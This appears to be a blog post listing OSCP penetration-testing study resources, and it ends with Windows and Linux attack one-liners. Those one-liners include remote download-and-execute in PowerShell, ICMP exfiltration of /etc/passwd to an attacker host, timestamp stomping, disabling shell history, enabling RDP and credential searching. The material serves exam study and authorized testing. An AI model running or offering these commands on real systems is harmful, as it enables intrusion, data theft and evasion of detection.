During my journey to getting the OSCP, I always come across many articles, Git repo, videos, and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great, I wanted to also build a curated list of the resources that I've collected overtime, all in one area for everyone to access.
This list will continue to grow over time as I come across new resources. If you know more resources or want me to add yours, please let me know and I'll add it in.
PS. A VERY big thank you to all the authors of these resources, for taking the time and energy putting this invaluable information together.
OSCP Certification Exam Guide - Offensive Security
31 Days of OSCP Experience - ParanoidNinja
Detailed Guide on OSCP Prep – From Newbie to OSCP - Ramkisan Mohan
Offensive Security Certified Professional – Lab and Exam Review - theslickgeek
Passing The OSCP - Pink_Panther
OSCP Experience and the first torture! - Nitesh Shilpkar
OSCP-like Vulnhub VMs - abatchy
OSCP Training VM’s hosted on Vulnhub.com - Andrew Hilton
Pinky's Palace CTFs - Pink_Panther
Hack The Box OSCP-like VMs - Tony
Search Ippsec's Videos for Specific Topics - ippsec
Hack The Box, Over The Wire, Other CTFs - derekrook
Metasploit Unleashed - Offensive Security
15 Ways to Download a File - NetSPI
Explain Shell - Great at explaining Linux Commands in Detail - Idan Kamara
OWASP Testing Guide v4 Table of Contents - owasp
Penetration Testing Tools Cheat Sheet - Arr0way
Reverse Shell Cheat Sheet - Arr0way
Linux Commands Cheat Sheet - Arr0way
Reverse Shell Cheat Sheet - Pentest Monkey
Black Room Sec - CTFs, Guides, Tools - blackroomsec
Dostoevskylabs's PenTest Notes - Dostoevskylabs
Pentest Compilation - adon90
SecLists - danielmiessler
OSCP-Prep - burntmybagel
OSCP-Prep - rhodejo
OSCP Scripts - garyhooks
OSCP Scripts & Documents - ihack4falafel
OSCP Recon Script - xapax
Cheatsheet-God - OlivierLaflamme
OSCP-Repo - rewardone
Cheatsheets - slyth11907
OSCP tricks - WarLord
Go-For-OSCP - WarLord
How to prepare for the OSCP ? A STUDY PLAN - Magda CHELLY, CISSP, Ph.D
OSCP useful Links - backdoorshell
Total OSCP Guide - sushant747
OSCP Course & Exam Preparation - 411Hall
OSCP Journey: Python Code Challenges - Elias Ibrahim
SMB Enumeration Checklist - 0xdf
Tunneling and Port Forwarding - HackTricks
Post-Exploitation Windows File Transfers with SMB - 0xdf
Multiple Ways to Exploit Tomcat Manager - Raj Chande
PHP Web Shell - WhiteWinterWolf
Msfvenom Cheat Sheet - LucianNitescu
Linux Shells - HackTricks
Windows Shells - HackTricks
Dumping Clear-Text Credentials - Pentestlab
OSCP Exam Report Template in Markdown - noraj
OSCP Omnibus - alexiasa
Brute Force - CheatSheet - HackTricks
Checklist - Linux Privilege Escalation - HackTricks
Checklist - Local Windows Privilege Escalation - HackTricks
Preliminary SQL Injection Part 1 - Jatin Yadav
Preliminary SQL Injection Part 2 - Jatin Yadav
Informix SQL Injection Cheat Sheet - pentestmonkey
MSSQL Injection Cheat Sheet - pentestmonkey
Oracle SQL Injection Cheat Sheet - pentestmonkey
MySQL SQL Injection Cheat Sheet - pentestmonkey
Postgres SQL Injection Cheat Sheet - pentestmonkey
DB2 SQL Injection Cheat Sheet - pentestmonkey
Ingres SQL Injection Cheat Sheet - pentestmonkey
SQL Injection Reference Library & Techniques - SQLINjection
OSCP - Linux Priviledge Escalation - WarLord
Basic Linux Privilege Escalation - g0tmi1k
Linux Priv escalation - carlospolop
Linux Privilege Escalation - HackTricks
OSCP - Windows Priviledge Escalation - WarLord
Awesome-Windows-Exploitation - enddo
Windows Priv escalation - kyawthiha7
Windows Privilege Escalation Fundamentals - FuzzySec (b33f)
Windows Priv escalation - carlospolop
Windows Local Privilege Escalation - HackTricks
PHP Local and Remote File Inclusion (LFI, RFI) Attacks - WarLord
Windows & Linux Exploit Development - FuzzySec (b33f)
Exploit DB - Offensive Security
Exploit Development - Starting from Part 1 - Corelan Team
Over The Wire - Wargames - OverTheWire
Unix Privilege Escalation Exploits - Kabot
Windows Kernel Exploits - SecWiki
Linux Kernel Exploits - lucyoa
Windows Exploit Development – Part 1: The Basics
Windows Exploit Development – Part 2: Intro-Stack-Overflow
Windows Exploit Development – Part 3: Changing-Offsets-and-Rebased-Modules
Windows Exploit Development – Part 4: Locating-Shellcode-Jumps
Windows Exploit Development – Part 5: Locating-Shellcode-Egghunting
Windows Exploit Development – Part 6: Seh-Exploits
Windows Exploit Development – Part 7: Unicode-Buffer-Overflows
Zero Day Zen Garden: Windows Exploit Development - Part 0 [Dev Setup & Advice]
Zero Day Zen Garden: Windows Exploit Development - Part 1 [Stack Buffer Overflow Intro]
Zero Day Zen Garden: Windows Exploit Development - Part 2 [JMP to Locate Shellcode]
Zero Day Zen Garden: Windows Exploit Development - Part 3 [Egghunter to Locate Shellcode]
Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]
Zero Day Zen Garden: Windows Exploit Development - Part 5 [Return Oriented Programming Chains]
~ Windows One-Liners ~ kindredsec
Obtain Permission String from All Services
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul
Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
Forward traffic to an internal host
netsh interface portproxy add v4tov4 listenport=*port* listenaddress=*ip* connectport=*port* connectaddress=*ip
Download and execute a remote PowerShell script (all in-memory)
iex (New-Object Net.Webclient).DownloadString('*remote_file*')
Check the permissions of all binaries associated with services
$list = Get-WmiObject win32_service | select -ExpandProperty PathName | Select-String -NotMatch svchost; foreach ( $path in $list ) { icacls $path 2>null | Select-String -NotMatch "Successfully processed" }
Enable RDP (may also need firewall rule)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
~ Linux One-Liners ~ kindredsec
Stomp a timestamp to match other install-time files
touch -a -m -t $(stat -c '%y' /bin/bash | cut -d ":" -f 1,2 | sed 's/[- :]//g') malicious_file.sh
Prevent ran bash commands from being written to a history file
export HISTFILE=/dev/null
Exfiltrate users over ICMP
while read line; do ping -c 1 -p $(echo "$line" | cut -d ":" -f 1,2,3,7 | xxd -ps) my_attacking_host; done < /etc/passwd
Locate mySQL credentials within web files
egrep -ri '(mysql_connect\(|mysqli_connect\(|new mysqli\(|PDO\(\"mysql:)' /var/www/* 2> /dev/null
List all the SUID Binaries on a System
find / -perm -4000 2>/dev/null
Creates iptables rules to transparently route traffic destined to a specific port to an internal host
iptables -t nat -A PREROUTING -i *interface* -p tcp --dport *port* -j DNAT --to-destination *remote_ip_address* & iptables -t nat -A POSTROUTING -o *interface* -p tcp --dport *port* -d *remote_ip_address* -j SNAT --to-source *local_ip_address*
List all running processes being ran by users other than your current one
ps -elf | grep -v $(whoami)
List all system cronjobs
for i in d hourly daily weekly monthly; do echo; echo "--cron.$i--"; ls -l /etc/cron.$i; done